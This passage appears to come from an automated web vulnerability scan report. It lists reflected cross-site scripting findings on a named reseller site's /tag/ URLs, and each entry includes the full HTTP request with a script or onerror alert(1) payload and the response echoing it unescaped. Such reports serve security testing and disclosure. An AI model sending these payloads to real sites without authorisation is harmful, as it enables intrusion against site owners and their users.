The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 872e8<img%20src%3da%20onerror%3dalert(1)>f7ca7a9bd63e69e4b was submitted in the REST URL parameter 2. This input was echoed as 872e8<img src=a onerror=alert(1)>f7ca7a9bd63e69e4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/hosting872e8<img%20src%3da%20onerror%3dalert(1)>f7ca7a9bd63e69e4b?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/hosting
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: hosti
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : hosting872e8<img src=a onerror=alert(1)>f7ca7a9bd63e69e4b]</td>
...[SNIP]...

2.4295. http://www.resellerbase.com/tag/hosting [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/hosting

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 18a34<img%20src%3da%20onerror%3dalert(1)>1de6157cd1 was submitted in the REST URL parameter 2. This input was echoed as 18a34<img src=a onerror=alert(1)>1de6157cd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/hosting18a34<img%20src%3da%20onerror%3dalert(1)>1de6157cd1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: hosti
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : hosting18a34<img src=a onerror=alert(1)>1de6157cd1]</td>
...[SNIP]...

2.4296. http://www.resellerbase.com/tag/hosting [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/hosting

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload a3f6c</title><img%20src%3da%20onerror%3dalert(1)>d365e3542eca3cfaf was submitted in the REST URL parameter 2. This input was echoed as a3f6c</title><img src=a onerror=alert(1)>d365e3542eca3cfaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/hostinga3f6c</title><img%20src%3da%20onerror%3dalert(1)>d365e3542eca3cfaf?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/hosting
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: hostinga3f6c</title><img src=a onerror=alert(1)>d365e3542eca3cfaf</title>
...[SNIP]...

2.4297. http://www.resellerbase.com/tag/hotel [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/hotel

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 886e7<script>alert(1)</script>4552894263f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag886e7<script>alert(1)</script>4552894263f/hotel HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag886e7<script>alert(1)</script>4552894263f/hotel was not found on this server.</p>
...[SNIP]...

2.4298. http://www.resellerbase.com/tag/hotel [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/hotel

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2bef0<script>alert(1)</script>affc5111a192e5fa8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag2bef0<script>alert(1)</script>affc5111a192e5fa8/hotel?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/hotel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag2bef0<script>alert(1)</script>affc5111a192e5fa8/hotel?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4299. http://www.resellerbase.com/tag/hotel [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/hotel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4fa41<img%20src%3da%20onerror%3dalert(1)>305ecb13fe03012a2 was submitted in the REST URL parameter 2. This input was echoed as 4fa41<img src=a onerror=alert(1)>305ecb13fe03012a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/hotel4fa41<img%20src%3da%20onerror%3dalert(1)>305ecb13fe03012a2?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/hotel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: hotel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : hotel4fa41<img src=a onerror=alert(1)>305ecb13fe03012a2]</td>
...[SNIP]...

2.4300. http://www.resellerbase.com/tag/hotel [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/hotel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 45c79<img%20src%3da%20onerror%3dalert(1)>101b5e39c75 was submitted in the REST URL parameter 2. This input was echoed as 45c79<img src=a onerror=alert(1)>101b5e39c75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/hotel45c79<img%20src%3da%20onerror%3dalert(1)>101b5e39c75 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: hotel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : hotel45c79<img src=a onerror=alert(1)>101b5e39c75]</td>
...[SNIP]...

2.4301. http://www.resellerbase.com/tag/hotel [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/hotel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload d3107</title><img%20src%3da%20onerror%3dalert(1)>c605c78512b10ca34 was submitted in the REST URL parameter 2. This input was echoed as d3107</title><img src=a onerror=alert(1)>c605c78512b10ca34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/hoteld3107</title><img%20src%3da%20onerror%3dalert(1)>c605c78512b10ca34?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/hotel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: hoteld3107</title><img src=a onerror=alert(1)>c605c78512b10ca34</title>
...[SNIP]...

2.4302. http://www.resellerbase.com/tag/hotel [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/hotel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 38565</title><img%20src%3da%20onerror%3dalert(1)>b44a57c3661 was submitted in the REST URL parameter 2. This input was echoed as 38565</title><img src=a onerror=alert(1)>b44a57c3661 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/hotel38565</title><img%20src%3da%20onerror%3dalert(1)>b44a57c3661 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: hotel38565</title><img src=a onerror=alert(1)>b44a57c3661</title>
...[SNIP]...

2.4303. http://www.resellerbase.com/tag/internet+access [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/internet+access

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f4ab8<script>alert(1)</script>96752948d03 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagf4ab8<script>alert(1)</script>96752948d03/internet+access HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagf4ab8<script>alert(1)</script>96752948d03/internet+access was not found on this server.</p>
...[SNIP]...

2.4304. http://www.resellerbase.com/tag/internet+access [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/internet+access

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1368d<script>alert(1)</script>c922b93dc5d8a9842 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag1368d<script>alert(1)</script>c922b93dc5d8a9842/internet+access?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/internet+access
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag1368d<script>alert(1)</script>c922b93dc5d8a9842/internet+access?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4305. http://www.resellerbase.com/tag/internet+access [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/internet+access

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 14a5c<img%20src%3da%20onerror%3dalert(1)>a472841738ad49d8a was submitted in the REST URL parameter 2. This input was echoed as 14a5c<img src=a onerror=alert(1)>a472841738ad49d8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/internet+access14a5c<img%20src%3da%20onerror%3dalert(1)>a472841738ad49d8a?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/internet+access
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: inter
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : internet access14a5c<img src=a onerror=alert(1)>a472841738ad49d8a]</td>
...[SNIP]...

2.4306. http://www.resellerbase.com/tag/internet+access [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/internet+access

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload bbc90</title><img%20src%3da%20onerror%3dalert(1)>71a8f287f30 was submitted in the REST URL parameter 2. This input was echoed as bbc90</title><img src=a onerror=alert(1)>71a8f287f30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/internet+accessbbc90</title><img%20src%3da%20onerror%3dalert(1)>71a8f287f30 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: internet accessbbc90</title><img src=a onerror=alert(1)>71a8f287f30</title>
...[SNIP]...

2.4307. http://www.resellerbase.com/tag/internet+access [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/internet+access

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d257f<img%20src%3da%20onerror%3dalert(1)>a502038acbd was submitted in the REST URL parameter 2. This input was echoed as d257f<img src=a onerror=alert(1)>a502038acbd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/internet+accessd257f<img%20src%3da%20onerror%3dalert(1)>a502038acbd HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: inter
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : internet accessd257f<img src=a onerror=alert(1)>a502038acbd]</td>
...[SNIP]...

2.4308. http://www.resellerbase.com/tag/internet+access [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/internet+access

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload f0428</title><img%20src%3da%20onerror%3dalert(1)>ff2a43c86b7feb432 was submitted in the REST URL parameter 2. This input was echoed as f0428</title><img src=a onerror=alert(1)>ff2a43c86b7feb432 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/internet+accessf0428</title><img%20src%3da%20onerror%3dalert(1)>ff2a43c86b7feb432?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/internet+access
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: internet accessf0428</title><img src=a onerror=alert(1)>ff2a43c86b7feb432</title>
...[SNIP]...

2.4309. http://www.resellerbase.com/tag/master+resell+rights [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/master+resell+rights

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 71e60<script>alert(1)</script>ca99623d27979aa43 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag71e60<script>alert(1)</script>ca99623d27979aa43/master+resell+rights?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/master+resell+rights
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag71e60<script>alert(1)</script>ca99623d27979aa43/master+resell+rights?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4310. http://www.resellerbase.com/tag/master+resell+rights [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/master+resell+rights

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e288a<script>alert(1)</script>ffd50b58fa2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tage288a<script>alert(1)</script>ffd50b58fa2/master+resell+rights HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tage288a<script>alert(1)</script>ffd50b58fa2/master+resell+rights was not found on this server.</p>
...[SNIP]...

2.4311. http://www.resellerbase.com/tag/master+resell+rights [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/master+resell+rights

Issue detail

